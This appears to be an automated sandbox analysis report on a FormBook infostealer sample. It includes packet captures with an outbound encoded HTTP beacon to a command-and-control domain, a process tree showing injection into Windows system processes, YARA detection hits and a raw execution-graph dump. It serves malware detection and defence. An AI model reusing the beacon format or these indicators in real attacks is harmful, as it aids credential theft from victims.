46 43 2b 44 76 58 69 68 77 43 6d 48 4c 4d [TRUNCATED]
                                                            Data Ascii: sVC8z= [TRUNCATED]
                                                            Nov 20, 2024 21:11:24.845030069 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:24 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Nov 20, 2024 21:11:24.845060110 CET | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                            Nov 20, 2024 21:11:24.845086098 CET | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                            Nov 20, 2024 21:11:24.845102072 CET | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                            Nov 20, 2024 21:11:24.845117092 CET | 896 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                            Nov 20, 2024 21:11:24.845134020 CET | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                            Nov 20, 2024 21:11:24.845149994 CET | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                            Nov 20, 2024 21:11:24.845165968 CET | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                            Nov 20, 2024 21:11:24.845361948 CET | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                            Nov 20, 2024 21:11:24.845525980 CET | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                            Nov 20, 2024 21:11:24.967655897 CET | 1236 | IN | Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            36 | 192.168.2.5 | 50013 | 203.161.42.73 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:11:26.666960001 CET | 377 | OUT | GET /gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.brightvision.website
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:11:27.981154919 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:27 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Nov 20, 2024 21:11:27.981173992 CET | 1236 | IN | Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                            Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                            Nov 20, 2024 21:11:27.981184006 CET | 1236 | IN | Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                            Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                            Nov 20, 2024 21:11:27.981194973 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                            Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                            Nov 20, 2024 21:11:27.981208086 CET896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                            Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                            Nov 20, 2024 21:11:27.981218100 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                            Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                            Nov 20, 2024 21:11:27.981291056 CET224INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                            Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.9428
                                                            Nov 20, 2024 21:11:27.981317043 CET1236INData Raw: 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                            Data Ascii: 2,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541"
                                                            Nov 20, 2024 21:11:27.981466055 CET1236INData Raw: 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38
                                                            Data Ascii: "m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,5
                                                            Nov 20, 2024 21:11:27.981477976 CET1236INData Raw: 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 36 31 34 31 35 34 70 78 3b 73 74 72 6f 6b 65 2d 6c
                                                            Data Ascii: style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.4580
                                                            Nov 20, 2024 21:11:28.103071928 CET1236INData Raw: 30 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 31 36 34 2e 35 37 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 33 32 31 2e 34 32 32 32 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35
                                                            Data Ascii: 07" cy="164.5713" cx="321.42224" id="path4565" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:15:08:18
                                                            Start date:20/11/2024
                                                            Path:C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
                                                            Imagebase:0x600000
                                                            File size:1'208'320 bytes
                                                            MD5 hash:DD888983C289F26094548B42AC5B6C85
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:15:08:19
                                                            Start date:20/11/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
                                                            Imagebase:0x5b0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:15:08:34
                                                            Start date:20/11/2024
                                                            Path:C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe"
                                                            Imagebase:0x3a0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:5
                                                            Start time:15:08:36
                                                            Start date:20/11/2024
                                                            Path:C:\Windows\SysWOW64\mobsync.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                            Imagebase:0x690000
                                                            File size:93'696 bytes
                                                            MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:15:08:49
                                                            Start date:20/11/2024
                                                            Path:C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe"
                                                            Imagebase:0x3a0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:7
                                                            Start time:15:09:01
                                                            Start date:20/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                              Execution Graph

                                                              Execution Coverage:3.9%
                                                              Dynamic/Decrypted Code Coverage:1.5%
                                                              Signature Coverage:9.5%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:55
93517->93519 93520 65e9a3 Mailbox 93518->93520 93521 60bdfa 48 API calls 93519->93521 93524 613200 334 API calls 93520->93524 93522 65ea05 CharUpperBuffW 93521->93522 93523 65ea1f 93522->93523 93525 65ea26 93523->93525 93526 65ea72 93523->93526 93524->93539 94301 649b72 48 API calls 93525->94301 93527 60936c 81 API calls 93526->93527 93528 65ea7a 93527->93528 94302 601caa 49 API calls 93528->94302 93531 65ea54 93532 6145e0 334 API calls 93531->93532 93532->93539 93533 65ea84 93534 60936c 81 API calls 93533->93534 93533->93539 93535 65ea9f 93534->93535 93536 60bc74 48 API calls 93535->93536 93537 65eaaf 93536->93537 93538 613200 334 API calls 93537->93538 93538->93539 93539->93354 93540->93355 93542 609384 93541->93542 93559 609380 93541->93559 93543 674cbd __i64tow 93542->93543 93544 674bbf 93542->93544 93545 609398 93542->93545 93552 6093b0 __itow Mailbox _wcscpy 93542->93552 93546 674ca5 93544->93546 93547 674bc8 93544->93547 93590 62172b 80 API calls 3 library calls 93545->93590 93591 62172b 80 API calls 3 library calls 93546->93591 93547->93552 93553 674be7 93547->93553 93549 61f4ea 48 API calls 93551 6093ba 93549->93551 93555 60ce19 48 API calls 93551->93555 93551->93559 93552->93549 93554 61f4ea 48 API calls 93553->93554 93556 674c04 93554->93556 93555->93559 93557 61f4ea 48 API calls 93556->93557 93558 674c2a 93557->93558 93558->93559 93560 60ce19 48 API calls 93558->93560 93559->93442 93560->93559 93592 606b0f 93561->93592 93563 60b69b 93603 60ba85 93563->93603 93565 60b6b5 Mailbox 93565->93444 93568 67397b 93614 6426bc 88 API calls 4 library calls 93568->93614 93569 60ba85 48 API calls 93582 60b495 93569->93582 93572 60b9e4 93615 6426bc 88 API calls 4 library calls 93572->93615 93573 673973 93573->93565 93576 60bcce 48 API calls 93576->93582 93577 673989 93578 60ba85 48 API calls 93577->93578 93578->93573 93579 673909 93581 606b4a 48 API calls 93579->93581 93584 673914 93581->93584 93582->93563 93582->93568 93582->93569 93582->93572 93582->93576 
93582->93579 93583 60bc74 48 API calls 93582->93583 93585 60bdfa 48 API calls 93582->93585 93588 673939 _memcpy_s 93582->93588 93597 60c413 59 API calls 93582->93597 93598 60bb85 93582->93598 93611 60c6a5 49 API calls 93582->93611 93612 60c799 48 API calls _memcpy_s 93582->93612 93583->93582 93587 61f4ea 48 API calls 93584->93587 93586 60b66c CharUpperBuffW 93585->93586 93586->93582 93587->93588 93613 6426bc 88 API calls 4 library calls 93588->93613 93589->93448 93590->93552 93591->93552 93593 61f4ea 48 API calls 93592->93593 93594 606b34 93593->93594 93595 606b4a 48 API calls 93594->93595 93596 606b43 93595->93596 93596->93582 93597->93582 93599 60bb9b 93598->93599 93602 60bb96 _memcpy_s 93598->93602 93600 61ee75 48 API calls 93599->93600 93601 671b77 93599->93601 93600->93602 93601->93601 93602->93582 93604 60bb25 93603->93604 93607 60ba98 _memcpy_s 93603->93607 93606 61f4ea 48 API calls 93604->93606 93605 61f4ea 48 API calls 93609 60ba9f 93605->93609 93606->93607 93607->93605 93608 60bac8 93608->93565 93609->93608 93610 61f4ea 48 API calls 93609->93610 93610->93608 93611->93582 93612->93582 93613->93573 93614->93577 93615->93573 93617 6235f0 _wprintf 93616->93617 93618 623604 93617->93618 93619 62361c 93617->93619 93651 627c0e 47 API calls __getptd_noexit 93618->93651 93626 623614 _wprintf 93619->93626 93629 624e1c 93619->93629 93622 623609 93652 626e10 8 API calls __cftof2_l 93622->93652 93626->93452 93630 624e4e EnterCriticalSection 93629->93630 93631 624e2c 93629->93631 93633 62362e 93630->93633 93631->93630 93632 624e34 93631->93632 93654 627cf4 93632->93654 93635 623578 93633->93635 93636 623587 93635->93636 93637 62359b 93635->93637 93732 627c0e 47 API calls __getptd_noexit 93636->93732 93640 623597 93637->93640 93692 622c84 93637->93692 93639 62358c 93733 626e10 8 API calls __cftof2_l 93639->93733 93653 623653 LeaveCriticalSection LeaveCriticalSection _fprintf 93640->93653 93647 6235b5 93709 62e9d2 93647->93709 93649 6235bb 93649->93640 93650 621c9d _free 
